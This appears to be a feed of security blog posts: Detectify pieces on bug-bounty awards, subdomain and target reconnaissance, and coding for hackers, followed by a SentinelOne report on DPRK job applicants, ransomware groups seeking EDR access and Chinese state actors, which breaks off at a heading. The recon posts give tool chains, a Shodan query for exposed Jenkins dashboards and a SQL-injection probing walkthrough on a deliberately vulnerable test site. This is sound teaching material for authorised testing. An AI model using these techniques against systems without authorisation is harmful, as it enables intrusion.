  • Every time a new vulnerability is found by a module, it produces a hit.
  • Each hit results in points awarded to the researcher. Low severity vulnerabilities result in 1 earned point, medium vulnerabilities earn 10 points, high vulnerabilities earn 100 points, and critical vulnerabilities earn 500 points.
  • Our team measures the points earned by our ethical hackers on a quarterly and annual basis, and we also keep tabs of our hackers’ total points. You can check out our current 2023 leaderboard here.

Without further ado, let’s recognize each of 2022’s award-winning Crowdsource hackers!

Leaderboard Leader

First up is our Leaderboard Leader award. This title goes to the Crowdsource ethical hacker who has collected the most points during the entire year. Coming in at the top of the leaderboard during 2022 was melbadry9, who managed to earn a whopping 77,229 points!Β 

In addition to this win, melbadry9 also hit 100,000 all-time points – another significant achievement on its own. Congratulations!

Substantial Submitter

Our Substantial Submitter, awarded for earning the highest number of valid submissions, goes to Geekfreak! Coming in at 87 valid submissions during 2022, this accomplishment is no small feat.Β 

Superiority SubmitterΒ 

Attaining the highest submission validity ratio in 5 or more submissions earns one of our hackers the title of Superiority Submitter. During 2022, we were impressed with the quality of the submissions from none other than Peter Jaric, whose submissions resulted in a 71% validity ratio. Kudos, Peter!

Fabulous Feedbacker

Detectify Crowdsource wouldn’t be where it is today without the feedback and support of our community members. For their constant willingness to help, great attitude, and proactive activity in our internal channels, we’d like to recognize Gehaxelt as 2022’s Fabulous Feedbacker!

Significant Start

The Significant Start award goes to a Crowdsource researcher who accumulated the most valid submissions during their first month in the Crowdsource community. Hardik, who had six valid submissions during his first 30 days in the community, is the much-deserved winner of this title.

Serial Submitter

Our Serial Submitter is a Crowdsource hacker who has had at least one valid submission during each month of the year. For his great contributions that come in on a consistent basis, we’re proud to present Geekfreak with this award.

Bullseye Bughunter

The coveted title of Bullseye Bughunter goes to a researcher with a validity ratio of 100%. This is of course very difficult to achieve, so we didn’t have a contributor who fit this award’s criteria for 2022. We’ve got high hopes for next year!


Team Trophy

Rounding out the 2022 Detectify Crowdsource Awards is our Team Trophy. This is an especially notable award, since it’s a title that is voted on by Detectify’s internal researchers. It goes to a Crowdsource researcher who has been a strong communicator and reliable, high-quality submitter. During 2022, we had not one but two hackers that stood out to our team’s researchers: j0v and tengeez. Congrats to you both!

We’d like to thank each and every member of our Crowdsource community for their valuable submissions – the Detectify Crowdsource Awards are just a small token of our appreciation for the important work that you do.Β 

Want to know more about Crowdsource? We encourage you to meet the Crowdsource community and find out more about how the program works.Β 

If you’re interested in getting involved, you can apply to hack with us today and become one of our ethical hackers who are passionate about securing modern technologies and making the Internet a safer place.

The post 2022 Detectify Crowdsource Awards: Meet the winners appeared first on Labs Detectify.

Advanced subdomain reconnaissance: How to enhance an ethical hacker’s EASM

13 January 2023 at 13:48

External Attack Surface Management (EASM) is the continuous discovery, analysis, and monitoring of an organization’s public facing assets. A substantial part of EASM is the discovery of subdomains. Basic techniques to enumerate subdomains could leave domains unmanaged and vulnerable. Quality EASM provides sufficient visibility of assets and is achieved by finding and monitoring as many subdomains as possible. This blog aims to provide a few advanced subdomain reconnaissance techniques to enhance an ethical hacker’s EASM techniques.

Enhancing the effectiveness of their subdomain enumeration

Many EASM programs limit the effectiveness of subdomain enumeration by relying solely on pre-made tools. The following techniques show how ethical hackers can expand their EASM program beyond the basics and build the best possible subdomain asset inventory.

Discovering root domains

Subdomain enumeration is commonplace, but root domain enumeration is often ignored. Root domain enumeration can be performed in many ways, including:

  • Acquisitions
  • Crawling
  • Google dorking
  • Checking ASNs and IP ranges
  • Reverse Whois

Acquisitions

Searching for acquisitions can help discover assets previously owned by an acquired company. You can search for acquisitions by visiting Crunchbase, searching for an organization, and scrolling down to β€œAcquisitions.” Here’s an example of Tesla’s acquisitions:

Crawling

Going to known in-scope domains and using a web crawler can lead you to new subdomains and root domains owned by the same company. Just remember to confirm that the new domain is in scope.

Using a tool like katana on a target’s seed domain can help you find new subdomains. For example, running katana -u https://tesla.com will find auth.tesla.com, ir.tesla.com, shop.tesla.com, and more.

Β 

Google dorkingΒ 

Using the power of Google can lead to a variety of findings. Try dorking for the company’s copyright using β€œΒ© [COMPANY]. All rights reserved.” or using the allintext, allintitle, and allinurl tags such as allintitle:”Yahoo”.

Checking ASNs and IP ranges

If the organization has an ASN or their own IP range, there are tools such as Shodan and dnsx that can check these for domains. You can search an organization’s ASN details with the Hurricane Electric BGP toolkit to find ASNs and IP ranges that can be scanned to discover new assets. Here’s just a few of the results from searching β€œTesla”:

Reverse Whois

WHOIS is a protocol that is mostly used for storing ownership information of domains. Normally, you provide a domain name and a WHOIS server will respond with the domain owner’s details, but there are services that allow you to do a reverse WHOIS lookup, where you provide an organization name or email address, and it will return all of the associated domains.

This information has a very low false positive rate and can yield thousands of domains for larger companies. Some of the more well-known reverse whois services are Whoxy, ViewDNS, and WhoisXMLAPI. They all offer APIs that will make it easy to automate the process.

Certificate transparency

Certificate transparency logs are a great way to find more subdomains that other methods may not discover. Here’s how it’s done:

  1. Go to the organization’s main site and find the certificate organization name

2. Take the organization name and query crt.sh for that organization

3. Take all common names found for that organization, and query those too. I used *.dev.ap.tesla.services here as an example.

This process discovered pages of subdomains that other methods could’ve missed. If you want to see a walkthrough of this method, check out Nahamsec’s video.

Permutations

Finding subdomains with permutations is a strategy that has gained a lot of traction recently and is something I have had a lot of success with. The basic idea is that we take subdomains we know to exist and then use them as seeds to generate permutations. For example, if app.example.com exists, we could test for the following:

  • app-staging.example.com
  • app-dev.example.com
  • App2.example.com

There are many tools for automating asset discovery through subdomain permutations, such as altdns, ripgen and regulator. I recommend testing all the tools and seeing which one suits you.

Continuous Monitoring

Continuous monitoring is essential because external attack surfaces are constantly changing. The key to effective EASM is that you are monitoring changes in as close to real-time as possible. Use automation to routinely check for:

  • New subdomains from passive sources
  • Bruteforcing new subdomains
  • New root domains
  • Extended updated information about subdomains (which ones resolve, open web ports, etc)

Summarizing advanced subdomain reconnaissance

This blogΒ  has offered helpful techniques for advanced subdomain reconnaissance that you can add to your EASM toolbelt. There are many data sources to evaluate when assessing an organization’s attack surface. As an ethical hacker, the more data sources you can include, the more effective your EASM will be. As I have mentioned in previous articles, organizations themselves should start thinking like us ethical hackers when it comes to assessing their internet-facing assets and continuously monitoring their growing attack surface. As this blog discusses, root domain enumeration can be performed in many ways, including:

  • Acquisitions
  • Crawling
  • Google dorking
  • Checking ASNs and IP ranges
  • Reverse Whois

Why not give it a try?

Additional reading

DNS Hijacking – Taking Over Top-Level Domains and Subdomains
Determining your hacking targets with recon and automation
[New research] Subdomain takeovers are on the rise and are getting harder to monitor


Written by:
Gunnar Andrews

My online alias isΒ G0lden. I am a hacker out of the midwest United States. I came into the hacking world through corporate jobs out of college, and I also do bug bounties. I enjoy finding new ways to hunt bugs and cutting-edge new tools. Making new connections with fellow hackers is the best part of this community for me!

The post Advanced subdomain reconnaissance: How to enhance an ethical hacker’s EASM appeared first on Labs Detectify.

Detectify Crowdsource offers ethical hackers more than continuous bounties

27 December 2022 at 14:40

Detectify Crowdsource is a platform for ethical hackers to scale the impact of their bug hunting through automation. Ethical hackers submit vulnerabilities they find in widely used technologies that are then automated and made available to thousands of

Detectify customers around the globe to enable them to secure their external attack surface. Each time a vulnerability is found in a unique customer asset, a bounty is paid to the ethical hacker who submitted the vulnerability.

Earlier this year, we facilitated a survey to learn more about our community of elite ethical hackers. We have subsequently used many of these insights to inform our product roadmap in 2022 and as we plan for next year. We asked a variety of questions, ranging from how many hours per week they spend hacking to what motivates them to keep hacking. We had nearly 200 ethical hackers participate in our survey, most of whom are members of Detectify Crowdsource. We summarized a few learnings from our survey to share with those interested in hacking with Detectify Crowdsource.

Over 50% of our users are experienced security engineersΒ 

Detectify Crowdsource challenges ethical hackers to find vulnerabilities in technologies used most frequently to build web applications. It was no surprise to us to learn that most survey respondents primarily hack technologies associated with web apps. However, we were pleased to learn that over 50% of our community members work as security engineers in their professional lives.

We also learned that 30% of our community of ethical hackers have 5 or more years of experience as ethical hackers. This not only means that Detectify’s EASM customers benefit from vulnerabilities found by experienced security engineers, but that our members also get to learn from other skilled members. We set a high bar to join our community and we are glad to see this reflected in our survey results.

Ethical hackers join Detectify Crowdsource to earn and learn

We’re pleased to learn that we have such a talented community of ethical hackers. However, we know it takes more than a compelling reward system to keep our members engaged. While 34% of survey respondents said that earning money is their top reason for hacking, a whopping 36% claimed that they hope to advance their career and learn through ethical hacking.Β 

There are many resources to improve your ethical hacking skills, and while we may be a little biased about some of our own content, we’ve listed some of our favorite resources:

Our EASM solution is powered by ethical hackers – we take that seriously

Detectify’s EASM platform tests our customer’s Internet-facing assets for vulnerabilities we’ve crowdsourced from our community of ethical hackers. Each time a vulnerability is discovered in a unique customer asset, the reporter of that vulnerability earns a bounty (no limit on earnings so long as that vulnerability is present in our customer’s attack surface). From day 1, we have prioritized support of our community – from quickly resolving issues and answering questions. We were reminded of how important a responsive team is through nearly 40% of survey respondents claiming that a responsive team is what makes a bug bounty platform most attractive.

Scale the impact of your next vulnerability finding with Detectify Crowdsource

Wondering how you can join our community of leading ethical hackers? Try out our signup challenge to see if you have the experience needed to join Detectify Crowdsource here.Β 

The post Detectify Crowdsource offers ethical hackers more than continuous bounties appeared first on Labs Detectify.

Determining your hacking targets with recon and automation

7 December 2022 at 09:50

Why picking targets is so important

Many ethical hackers struggle because they are hacking the β€œwrong” types of targets for them. This is especially true for independent researchers or bug bounty hunters. These endeavors only pay for results and findings, not the time invested. Ethical hackers with a good return on their time ensure that their efforts are focused on hacking targets they are comfortable with. A target that is right for you as an ethical hacker could be any of the following:

  • A target using technology or framework you are an expert in.
  • A website or asset that appears old or deprecated.
  • Older versions of a released product that are still deployed.
  • Web applications that accept a large amount of user input.
  • Hacking targets that have had vulnerabilities in the past that you are an expert in.

This list can go on even beyond this. But the idea is that you should always try hacking targets you already have an advantage on. But, how do you find these targets and recognize them from a massive list of targets? The answer is recon and automation!

When recon and automation are an advantage for hacking targets

Recon and automation can be powerful tools for ethical hackers. Recon is the step in which asset discovery takes place. The better you perform your recon, the better the results of your hacking are likely to be. There are many ways that recon can be an advantage, such as:

  • Finding hacking targets other ethical hackers missed.
  • Creating a database of assets that can continuously be hacked or scanned.
  • Fingerprinting assets to find technology/frameworks you know.
  • Creating a system to learn about new assets that get deployed.

Using recon to find any of the things above will increase the chances you have success when you hack. Using some of these tricks, you can use recon to take your hacking to the next level and ensure you are only hacking the targets that are best for you.Β 

When recon is a disadvantage for hacking targets

A word of warning when it comes to recon and automation. While it is true that finding more lucrative assets is a good thing, it’s not the end game. Ethical hackers often get stuck doing so much recon work that they never actually hack the targets. Like all things, there is a balance between reconnaissance and hands-on hacking. If you find yourself struggling with this balance, here are some tips:

  • Only use recon to find the information you actively use in your hands-on hacking.
  • Automate more of your recon tasks.
  • Minimize the targets you are hacking at one time.

Utilizing recon correctly can exponentially increase the returns of your hacking efforts, but getting stuck in the recon phase or getting hit with information overload, can actually hold you back. Balance is key!

Digging for gold where others aren’t

Using recon to find juicy hacking targets is like digging for gold. To find gold, you have to dig where others are not. For example, many bug bounty hunters use the same subdomain enumeration tools, sources, and techniques as everyone else. There are a few that dig much deeper than this. To go one step further, you can for example, try fuzzing, brute forcing, generating permutations. The deeper you go, the more likely you are to uncover assets that are untouched by others.

β€œBug hunters can find more gold while digging by performing recon continuously.”

Another way other bug hunters can find more gold while digging is by performing recon continuously. Almost every ethical hacker will perform recon once when they first engage the target. Once they have completed gathering information through recon, it is never done again. But imagine a target deploys a new domain the very next day. You would never know the domain exists without continuous recon. This is a perfect use case for automation. Writing some scripts that continuously do recon on your target and report new findings is relatively easy. And the benefits are well worth the work. Any new domains found are always worth a look at if you are confident you stumbled across them first. It is like digging for gold in an untouched cave!

More gold to dig

So far, we have talked mostly about subdomain recon, but it doesn’t end there. Recon can be used to find things that other ethical hackers have yet to find, allowing you the chance to test them first. Some of these things are:

  • Hidden endpoints (ex: unlinked endpoints, older versions of APIs, etc.)
  • Hidden parameters (ex: admin=true, debug=true, etc.)
  • Comments from developers
  • Virtual hosts
  • Secrets (ex: API keys)

There are many things that recon can uncover. And thankfully, many ethical hackers have already made tools to help look for all of these things. Here are some examples:

  • FFUF (finding hidden endpoints)
  • Arjun (finding hidden parameters)
  • Gobuster (searching for virtual hosts)
  • Trufflehog (Secrets finder!)


Examples of using recon automation to uncover hacking targets


Finding technologies with Shodan

Shodan can be used to find all kinds of good targets with technology that you like or enjoy hacking on. There are a lot of repositories on GitHub for Shodan dorks if you want to check them out. A really simple example is looking for Jenkins server dashboards that are publicly available:Β 

    1. Browse to shodan.io
    2. For finding Jenkins dashboards, we will try the query: x-jenkins 200
      Note: If you have a Shodan subscription you can use other filters or tags to narrow down results even further.

  1. From here, you can poke around the results and check the domains/IPs against known bug bounty targets (Solid list of all public targets HERE)
  2. If you find one in scope for a program, hack away!

This is a very small example of how Shodan could be used to find hacking targets that would be good for you. Also, I showed the search engine in the browser in the above example. This could be automated with the shodan cli!

Finding web hacking targets with httpx

Httpx is a HTTP toolkit created by Project Discovery. Part of this toolkit is the ability to run technology detection using known fingerprints. In fact, right in the readme file in the repository is an example using their subfinder tool and httpx to quickly enumerate subdomains for a target, then grab their status codes, HTTP title, and run technology detection:

subfinder -d detectify.com -silent| httpx -title -tech-detect -status-code

This example is very basic, yet surprisingly quick and effective to quickly generate a list of a target’s domains and some good information about them. Look at the titles, status codes, and technology feedback. And from there, you should be able to discern which domains are best for you.

Using Arjun to find parameters

Arjun can be used to find all available parameters on a page. This can be useful in many situations. This example is going to show a purposely vulnerable page.

  1. Browse to http://testphp.vulnweb.com/listproducts.php
  2. You will notice a SQL error immediately. This is an obvious signal that an SQL injection could be possible
  3. Point Arjun at the page
  4. Here you can see that the tool found three possible parameters
  5. Try the artist parameter (http://testphp.vulnweb.com/listproducts.php?artist=test). You will notice the SQL error message changes based on what you put in the artist parameter. We are getting closer.
  6. From here feel free to exploit the SQL injection by hand or use sqlmap for help.

This is a small example showing the power of enumerating parameters. Finding all the parameters available to you will open up your attack surface as much as possible. Also, as with the other examples, this can be automated. Below would be a small tool chain using Subfinder, hakrawler, httpx, and Arjun:

subfinder -d detectify.com -silent | httpx -silent | hakrawler -u | grep β€œdetectify.com” > targets.txt && arjun -i targets.txt -oJ data.json

The above tool chain will find subdomains of a target. Use httpx to find which domains have open web ports that are browsable, then spider those domains with hakrawler to find all the pages, and finally run Arjun on each page to find all the parameters for each page. When this stops running, you should have a good list of the pages on a web application, as well as all of the parameters for each page. If you want to take this even further with automation, I would recommend trying to filter your parameters using something like GF and some patterns.

Conclusion

Recon can be one of the strongest tools in a hacker’s tool belt and is a great way to discover hacking targets. I hope something in this post helps you realize there might be a gap in your recon you can fill or that it may be time to automate some of your recon methodologies. I hope you can take something from this and use it to glean more findings. You can easily keep up with new techniques to find hidden assets and hacking targets by following the hacker community on Twitter, Slack, and other communication platforms.


Written by:
Gunnar Andrews

My online alias is G0lden. I am a hacker out of the midwest United States. I came into the hacking world through corporate jobs out of college, and I also do bug bounties. I enjoy finding new ways to hunt bugs and cutting-edge new tools. Making new connections with fellow hackers is the best part of this community for me!

The post Determining your hacking targets with recon and automation appeared first on Labs Detectify.

Should you learn to code before you learn to hack?

30 November 2022 at 15:10

You will find a common pattern if you read blog posts or watch interviews with some of today’s top ethical hackers. When asked if coding knowledge is needed for hacking, the answer is almost always the same: It’sΒ possibleΒ to become a great hacker without coding knowledge, but having coding experience makes it aΒ whole lot easier. Knowing how software is built in theory makes it easier to break. This blog post will discuss some of the advantages that coding knowledge can give you when you start hacking.

Writing your own tools

Ethical hackers have created many tools for specific purposes to help them with their hacking. You can do the same. By creating your own tools, you know exactly what each tool is doing.

Here’s a simple process I follow when creating my own tools:Β 

Find a gap in currently available tooling
This could be a tool that might be outdated or deprecated. It could also be an area that requires a solution. Find a spot where your knowledge of the topic and programming skills can shine.

Create your updated or new tool.
If you’re updating an existing tool, this may look more like forking a GitHub repo and changing/adding code. If you are creating a brand new tool, this might look like creating your new repository and starting from scratch.

Test your new tool against local targets.
This is the easiest way to determine if your new tool is working as expected. Spending more time in the testing phase will benefit you in the long run.

Deploy your tool against real targets.
Pick some bug bounty targets or something you have permission to hack and deploy your shiny new tool against it.

Open source it (or don’t!).
This is the easiest way to determine if your new tool is working as expected. Spending more time in the testing phase will benefit you in the long run.

Insider knowledge

Knowing the internal details of the software you’re hacking is like using cheat codes in video games. It changes the game entirely. An ethical hacker with development experience can make educated guesses about how a feature is implemented in the backend and what vulnerabilities are likely to have been introduced. Without development experience, an ethical hacker spends more time shooting in the dark and relying solely on probe results to determine suspicious behaviors.

β€œKnowing the internal details of the software you’re hacking is like using cheat codes in video games.”

For this reason, when approaching a new target as a an ethical hacker with development experience, it is advantageous to focus on assets that use languages, frameworks, and technologies you’re familiar with. This will ensure that you are approaching the target with an advantage. There are many ways to find these targets:

  • If you’re hacking on a bug bounty platform, many of them list the technologies used by each target within the bounty brief.
  • Use technology fingerprinting tools such asΒ wappalyzerΒ orΒ httpx.
  • Use search engines like Google andΒ Shodan

Source code review

Some of the juiciest bugs are very difficult to uncover from pure black-box testing. Reviewing source code offers more insights and a fresh perspectives on applications that can yield more bugs. Someone with coding experience will always be more adept at uncovering vulnerable code than someone without coding experience. This is especially true if you have experience with the language or framework being used.

There are many ways to find source code to review, including:

  • Reviewing open source code (of course!)
  • Decompiling Java
  • Reviewing containerized software in public registries

Some examples of these methods leading to high/critical severity CVEs areΒ CVE-2020-13379Β (Found by Justin Gardner) andΒ CVE-2021-22054 (Found by Keiran Sampson, James Hebden, and Shubham Shah). These examples are great to read through to get an idea of the kinds of sources and sinks ethical hackers look for in modern software.

Automation

Companies and researchers alike are trying to automate as much as possible. In theory, this only makes you more efficient if the menial tasks involved with hacking are automated. As you may have guessed, one of the best new ways to flex your programming skills is to automate steps of the hacking methodology. This can look very different depending on the task you are trying to automate. I would recommend thinking about it using the following steps:

What does the input data look like?
Are you taking info from stdin on a command line or pulling data from a database? What format is the input in? (ex: JSON, text, CSV, etc.)

How should your automation be ingesting this data to produce results?
Is it making requests with this data, decoding the data, or maybe using the data for some type of analysis?

What does the resulting output data look like, and where is it stored?
This looks very similar to step #1. What format is it, and where is it being stored?

How will you deploy this automation in a way that can scale to handle enough targets?
(ex: Are you using VPS servers? Will there be one big script or a bunch of smaller ones?)Β 

The language or framework you use is up to you. If you follow the above steps to use your programming knowledge to start automating your tasks, I can promise you that you will see an improvement in your results!

Resources to learn more

Whether you have prior programming knowledge and this blog has convinced you to utilize it in your hacking adventures, or you are now convinced it is time to learn some programming, here are some resources to get you started:

If you have the programming knowledge and are ready to use it to your advantage, I recommend you grab some source code from a bug bounty program, an open-source project, or otherwise publicly available software and start hacking. I hope this has encouraged some developers to try flexing those ethical hacker muscles. I think you will find that it can be a very fun transition to try breaking software instead of building it. Many developer-turned-hackers would love to welcome you to the club. Have fun and happy hacking!


Written by:
Gunnar Andrews

My online alias is G0lden. I am a hacker out of the midwest United States. I came into the hacking world through corporate jobs out of college, and I also do bug bounties. I enjoy finding new ways to hunt bugs and cutting-edge new tools. Making new connections with fellow hackers is the best part of this community for me!

The post Should you learn to code before you learn to hack? appeared first on Labs Detectify.

The SQL Server Crypto Detour

16 April 2025 at 23:01
One of the things that I love about my role at SpecterOps is getting to dig into various technologies and seeing the resulting research being used in real-time. This post will explore one such story of how I was able to go from a simple request of recovering credentials from a database backup, to reverse engineering how SQL Server encryption works, finding some new methods of brute-forcing database encryption keys.. and finally identifying a mistake in ManageEngine’s ADSelfService product which allows encrypted database backups to reveal privileged credentials.

Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries

Executive Summary

  • In recent months, SentinelOne has observed and defended against a spectrum of attacks from financially motivated crimeware to tailored campaigns by advanced nation-state actors.
  • These incidents were real intrusion attempts against a U.S.-based cybersecurity company by adversaries, but incidents such as these are neither new nor unique to SentinelOne.
  • Recent adversaries have included:
    • DPRK IT workers posing as job applicants
    • ransomware operators probing for ways to access/abuse our platform
    • Chinese state-sponsored actors targeting organizations aligned with our business and customer base
  • This report highlights a rarely-discussed but crucially important attack surface: security vendors themselves.

Overview

At SentinelOne, defending against real-world threats isn’t just part of the job, it’s the reality of operating as a cybersecurity company in today’s landscape. We don’t just study attacks, we experience them firsthand, levied against us. Our teams face the same threats we help others prepare for, and that proximity to the front lines shapes how we think, and how we operate. Real-world attacks against our own environment serve as constant pressure tests, reinforcing what works, revealing what doesn’t, and driving continuous improvement across our products and operations. When you’re a high-value target for some of the most capable and persistent adversaries out there, nothing less will do.

Talking about being targeted is uncomfortable for any organization. For cybersecurity vendors, it’s practically taboo. But the truth is security vendors sit at an interesting cross-section of access, responsibility, and attacker ire that makes us prime targets for a variety of threat actors, and the stakes couldn’t be higher. When adversaries compromise a security company, they don’t just breach a single environmentβ€”they potentially gain insight into how thousands of environments and millions of endpoints are protected.

In the past several months alone, we’ve observed and defended against a spectrum of attacks ranging from financially motivated crimeware to tailored campaigns by advanced nation-state actors. They were real intrusion attempts targeting a U.S.-based cybersecurity company β€” launched by adversaries actively looking for an advantage, access, or leverage. Adversaries included DPRK IT workers posing as job applicants, ransomware operators probing for ways to access/abuse our platform, and Chinese state-sponsored actors targeting organizations aligned with our business and customer base.

We are certainly not the only ones facing these threats. In the spirit of furthering collective defenses and encouraging further collaboration, we’re pulling back the curtain to share some of what we’ve seen, why it matters, and what it tells us about the evolving threat landscapeβ€”not just for us, but for every company building and relying on modern security technology.

DPRK IT Workers Seeking Inside Jobs

One of the more prolific and persistent adversary campaigns we’ve tracked in recent years involves widespread campaigns by DPRK-affiliated IT Workers attempting to secure remote employment within Western tech companies– including SentinelOne. Early reports drew attention to these efforts and our own analysis revealed further logistical infrastructure to launder illicit funds via Chinese intermediary organizations. However, neither gave a sense of the staggering volume of ongoing infiltration attempts. This vector far outpaces any other insider threat vector we monitor.

These actors are not just applying blindly β€” they are refining their process, leveraging stolen or fabricated personas, and adapting their outreach tactics to mirror legitimate job seekers in increasingly convincing ways. Our team has tracked roughly 360 fake personas and over 1,000 job applications linked to DPRK IT worker operations applying for roles at SentinelOne β€” even including brazen attempts to secure positions on the SentinelLabs intelligence engineering team itself.

Public reporting of DPRK IT workers applying to threat intelligence positions
Public reporting of DPRK IT workers applying to threat intelligence positions

Engagement and Adversary Interaction

Instead of staying passive, we made a deliberate choice towards intelligence-driven engagement. In coordination with our talent acquisition teams, we developed workflows to identify and interact with suspected DPRK applicants during the early phases of their outreach. This collaboration was key. By embedding lightweight vetting signals and monitoring directly into recruiting processes β€” without overburdening hiring teams β€” we were able to surface anomalous patterns tied to DPRK-affiliated personas piped directly into our Vertex Synapse intelligence platform for analyst review.

Our attempted interactions offered rare insights into the craftiness and persistence of these infiltration campaigns β€” particularly the ways in which adversaries adapt to the friction they encounter.

Inbound DPRK referral request to strategic employees
Inbound DPRK referral request to strategic employees

The attackers are honing their craft beyond the job application and recruitment process. An operation of this scale and nature requires a different kind of backend infrastructure, such as a sprawling network of front companies to enable further laundering and logistics.

DPRK IT Worker Front Company Network (November 2024)
DPRK IT Worker Front Company Network (November 2024)

Helping Hiring Teams Help Us

A key takeaway in working on this investigation was the value of intentionally creating inroads and sharing threat context with different teams not normally keyed into investigations. Rather than cluelessness, we encountered an intuitive understanding of the situation as recruiters had already been filtering out and reporting β€˜fake applicants’ within their own processes.

We brought campaign-level understanding that was combined with tactical insights from our talent team. The payoff was immediate. Recruiters began spotting patterns on their own, driving an increase in early-stage escalation of suspicious profiles. They became an active partner that continues to flag new sightings from the frontlines. In turn, we are codifying these insights into automated systems that flag, filter, enrich, and proactively block these campaigns to lower the burden on our recruiters and hiring managers, and reduce the risk of infiltration.

Make cross‑functional collaboration standard operating procedure: equip frontline business unitsβ€”from recruiting to salesβ€”with shared threat context and clear escalation paths so they can surface anomalies early without slowing the business. Codifying insights with automation will consistently bring bi-directional benefits.

The DPRK IT worker threat is a uniquely complex challenge β€” one where meaningful progress depends on collaboration between the security research community and public sector partners.

Ransomware Group Capability Development

Financially motivated threat actors frequently target enterprise security platforms β€”products designed to keep them from making moneyβ€”for direct access. SentinelOne, like our peers, is no exception. While uncomfortable, this is a reality the industry faces continually and should handle with both transparency and urgency.

Forum post offering security product access
Forum post offering security product access

Privileged access to administrative interfaces or agent installers for endpoint security products provides tangible advantages for adversaries seeking to advance their operations. Console access can be used to disable protections, manipulate configurations, or suppress detections. Direct, unmonitored access to the endpoint agent offers opportunities to test malware efficacy, explore bypass or tampering techniques, and suppress forensic visibility critical for investigations. In the wrong hands, these capabilities represent a significant threat to both the integrity of security products and the environments they protect.

This isn’t a new tactic. Various high-profile criminal groups have long specialized in social engineering campaigns to gain access to core security tools and infrastructureβ€”ranging from EDR platforms (including SentinelOne and Microsoft Defender) to IAM and VPN providers such as Okta. Their goal: expand footholds, disable defenses, and obstruct detection long enough to profit.

Recent leaks related to Black Basta further underscore this trend. The group’s operators were observed testing across multiple endpoint security platformsβ€”including SentinelOne, CrowdStrike, Carbon Black, and Palo Alto Networksβ€”before launching attacks, suggesting a systematic effort to evaluate and evade security tools prior to deployment.

Black Basta leak excerpts
Black Basta leak excerpts

Economy/Ecosystem

There is an increasingly mature and active underground economy built around the buying, selling, and renting of access to enterprise security tools. For the right price, aspiring threat actors continually attempt to obtain time-bound or persistent access to our EDR platform and administrative consoles. Well-known cybercrime forums are filled with vendors openly advertising such accessβ€”and just as many buyers actively seeking it. This includes long-established forums like XSS[.]is, Exploit[.]in and RAMP.

That said, more of this activity has been moving to confidential messaging platforms as well (Telegram, Discord, Signal). For example, Telegram bots are used to automate trading this access, and Signal is often used by threat actors to discuss nuance, targeting and initial access operations.

This supply-and-demand dynamic is not only robust but also accelerating. Entire service offerings have emerged around this ecosystem, including β€œEDR Testing-as-a-Service,” where actors can discreetly evaluate malware against various endpoint protection platforms.

Proposed Private EDR testing service
Proposed Private EDR testing service

While these testing services may not grant direct access to full-featured EDR consoles or agents, they do provide attackers with semi-private environments to fine-tune malicious payloads without the threat of exposureβ€”dramatically improving the odds of success in real-world attacks.

Prospective buyer for EDR installs
Prospective buyer for EDR installs

Access isn’t always bought, however. Threat actors frequently harvest legitimate credentials from infostealer logsβ€”a common and low-cost method of acquiring privileged access to enterprise environments. In cases where existing customers reuse credentials, this can translate into a threat actor also gaining access to security tools. In more targeted operations, actors have also turned to bribery, offering significant sums to employees willing to sell out their account access.

These insider threats are not hypothetical. For instance, some groups have been observed offering upwards of $20,000 to employees at targeted companies in exchange for insider assistanceβ€”an approach openly discussed in the same dark web forums where compromised credentials and access are routinely traded.

On the defensive side, this requires constant monitoring and maintenance. Situational awareness has to be prioritized in order to maintain platform integrity and protect our legitimate customers. Our research teams are constantly monitoring for this style of abuse and access β€˜leakage’, focusing on anomalous console access and site-token usage, and taking necessary actions to revoke these access vectors. This prohibits threat actors from fully interacting with the wider platform, and essentially orphans leaked agent installs, limiting the use of the agent in the hands of the threat actor.

Nitrogen β€” Threat Operators β€˜Leveling Up’

Some ransomware operations are now bypassing the underground market altogetherβ€”opting instead for more tailored, concentrated-effort impersonation campaigns to gain access to security tools. This approach is epitomized by the Nitrogen ransomware group.

Nitrogen is believed to be operated by a well-funded Russian national with ties to earlier groups like Maze and Snatch. Rather than purchasing illicit access, Nitrogen impersonates real companiesβ€”spinning up lookalike domains, spoofed email addresses, and cloned infrastructure to convincingly pose as legitimate businesses. Nitrogen then purchases official licenses for EDR and other security products under these false pretenses.

This kind of social engineering is executed with precision. Nitrogen typically targets small, lightly vetted resellersβ€”keeping interactions minimal and relying on resellers’ inconsistent KYC (Know Your Customer) practices to slip through the cracks.

These impersonation tactics introduce a new layer of complexity for defenders. If a threat actor successfully acquires legitimate licenses from a real vendor, they can weaponize the product to test, evade, and potentially disable protectionsβ€”without ever having to engage with criminal markets.

This highlights a growing challenge for the security industry: reseller diligence and KYC enforcement are clearly part of the threat surface. When those controls are weak or absent, adversaries like Nitrogen gain powerful new ways to elevate their campaignsβ€”often at a lower cost and lower risk than the black market.

Lessons Learned and Internal Collaboration

One of the most impactful lessons from tracking adversaries targeting our platform has been the value of deep, early collaboration across internal teams β€” particularly those not traditionally pulled into threat response efforts. For example, by proactively engaging with our reseller operations and customer success teams, we can surface valuable signals on questionable license requests, reseller behavior anomalies, and business inconsistencies that could have otherwise gone unnoticed.

By creating shared playbooks, embedding lightweight threat context, and establishing clear escalation paths, reactive processes turn into proactive signal sources. Now, suspicious licensing activityβ€”especially when paired with evasive behaviors or mismatched domain metadataβ€”can surface much earlier in the workflow.

To scale this effort, we increasingly lean into automation. By codifying threat patternsβ€”such as domain registration heuristics, behavioral metadata mismatches, and reseller inconsistenciesβ€”organizations can automate enrichment and risk-scoring for incoming licensing requests. This can then be used to dynamically filter, flag, and in some cases, auto-block high-risk activity before it reaches onboarding.

The growing trend of adversaries exploiting sales processesβ€”whether through impersonation, social engineering, or brute-force credential useβ€”means security vendors must treat every access vector, including commercial and operational pipelines, as part of the attack surface. Making cross-functional threat awareness standard operating procedure and integrating detection logic at the edge of business systems is essential.

We’re continuing to improve this work in quiet ways. And while we won’t share every detection logic here (for obvious reasons), we encourage others in the industry to pursue similar internal partnerships. Sales and support teams may already be seeing signs of abuseβ€”security teams just need to give them the lens to recognize it.

Chinese State-Sponsored Adversaries

One notable set of activity, occurring over the previous months, involved reconnaissance attempts against SentinelOne’s infrastructure and specific high value organizations we defend. We first became aware of this threat cluster during a 2024 intrusion conducted against an organization previously providing hardware logistics services for SentinelOne employees. We refer to this cluster of activity as PurpleHaze, with technical overlaps to multiple publicly reported Chinese APTs.

The PurpleHaze Activity Cluster

